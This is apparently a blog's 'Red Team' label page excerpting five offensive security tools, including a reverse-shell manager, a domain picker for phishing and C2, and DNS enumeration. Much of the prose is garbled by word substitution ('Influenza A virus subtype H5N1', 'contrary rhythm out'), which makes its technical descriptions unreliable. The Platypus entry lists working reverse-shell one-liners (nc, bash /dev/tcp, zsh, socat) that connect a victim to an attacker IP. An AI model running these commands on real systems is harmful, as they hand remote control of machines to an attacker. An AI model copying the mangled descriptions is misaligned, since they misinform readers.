Posts

Showing posts with the label Red Team

Sheepl - Creating Realistic User Demeanor For Supporting Tradecraft Evolution Inside Lab Environments

Image
Sheepl : Creating realistic user behavior for supporting tradecraft evolution within lab environments Introduction There are lots of resources available online relating to how you lot tin educate AD network environments for the evolution of blue team too red team tradecraft. However the electrical current solutions tend to lack 1 of import facial expression inwards representing existent the world network configurations. H5N1 network is non but a collection of static endpoints, it is a platform for communication betwixt people. Sheepl is a tool that aims to yoke the gap past times emulating the behavior that people unremarkably undertake within a network environment. Using Python3 too AutoIT3 the output tin last compiled into a standalone executable without whatever other dependancies that when executed on an Windows endpoint, executes a laid of tasks randomly over a chosen fourth dimension frame. For crimson teamers this tin serve to introduce those moments of chance t...

Domain Hunter - Checks Expired Domains For Categorization/Reputation As Well As Archive.Org History To Own Upward One's Heed Skilful Candidates For Phishing As Well As C2 Domain Names

Image
Domain refer choice is an of import seem of training for penetration tests as well as specially Red Team engagements. Commonly, domains that were used previously for benign purposes as well as were properly categorized tin endure purchased for alone a few dollars. Such domains tin allow a squad to bypass reputation based spider web filters as well as network egress restrictions for phishing as well as C2 related tasks. This Python based tool was written to speedily inquiry the Expireddomains.net search engine for expired/available domains amongst a previous history of use. It as well as then optionally queries for domain reputation against services similar Symantec WebPulse (BlueCoat), IBM X-Force, as well as Cisco Talos. The primary tool output is a timestamped HTML tabular array means report. Changes 5 Oct 2018 Fixed logic for filtering domains amongst desirable categorizations. Previously, or hence fault weather weren't filtered as well as would lawsuit inwards do...

Redelk - Tardily Deployable Tool For Cherry-Red Teams Used For Tracking Too Alarming Nigh Blueish Squad Activities Equally Good Equally Improve Usability Inwards Long Term Operations

Image
Red Team's SIEM - slow deployable tool for Red Teams used for tracking together with alarming nearly Blue Team activities every bit good every bit improve usability for the Red Team inward long term operations. Initial world free at BruCON 2018: Video: https://www.youtube.com/watch?v=OjtftdPts4g Presentation slides: https://github.com/outflanknl/Presentations/blob/master/MirrorOnTheWall_BruCon2018_UsingBlueTeamTechniquesinRedTeamOps_Bergman-Smeets_FINAL.pdf Goal of the project Short: a Red Team's SIEM. Longer: a Red Team's SIEM that serves 3 goals: Enhanced usability together with overview for the cerise squad operators past times creating a primal place where all relevant operational logs from multiple teamservers are collected together with enriched. This is peachy for historic searching inside the performance every bit good every bit giving a read-only persuasion on the performance (e.g. for the White Team). Especially useful for multi-scenario, multi-tea...

Platypus - A Modern Multiple Contrary Compaction Sessions Director Written Inwards Go

Image
Influenza A virus subtype H5N1 modern multiple contrary rhythm out sessions/clients managing director via concluding written inwards go . Features Multiple service listening port Multiple customer connections RESTful API Reverse rhythm out equally a service Screenshot Network Topology Attack IP: 192.168.1.2 Reverse Shell Service: 0.0.0.0:8080 RESTful Service: 127.0.0.1:9090 Victim IP: 192.168.1.3 Run Platypus from source code go larn github.com/WangYihang/Platypus cd go/src/github.com/WangYihang/Platypus larn run platypus.go Run Platypus from liberate binaries // Download binary from https://github.com/WangYihang/Platypus/releases chmod +x ./Platypus_linux_amd64 ./Platypus_linux_amd64 Victim side nc -e /bin/bash 192.168.1.2 8080 bash -c 'bash -i >/dev/tcp/192.168.1.2/8080 0>&1' zsh -c 'zmodload zsh/net/tcp && ztcp 192.168.1.2 8080 && zsh >&$REPLY 2>&$REPLY 0>&$REPLY' socat exec:'bas...

Amass - In-Depth Dns Enumeration As Well As Network Mapping

Image
The OWASP Amass tool suite obtains subdomain names past times scraping information sources, recursive animate beingness forcing, crawling spider web archives, permuting/altering names as well as contrary DNS sweeping. Additionally, Amass uses the IP addresses obtained during resolution to notice associated netblocks as well as ASNs. All the information is as well as hence used to range maps of the target networks. Information Gathering Techniques Used: DNS: Basic enumeration, Brute forcing (upon request), Reverse DNS sweeping, Subdomain cite alterations/permutations, Zone transfers (upon request) Scraping: Ask, Baidu, Bing, CommonCrawl, DNSDB, DNSDumpster, DNSTable, Dogpile, Exalead, FindSubdomains, Google, IPv4Info, Netcraft, PTRArchive, Riddler, SiteDossier, ThreatCrowd, VirusTotal, Yahoo Certificates: Active pulls (upon request), Censys, CertDB, CertSpotter, Crtsh, Entrust APIs: BinaryEdge, BufferOver, CIRCL, HackerTarget, PassiveTotal, Robtex, SecurityTrails, Shodan...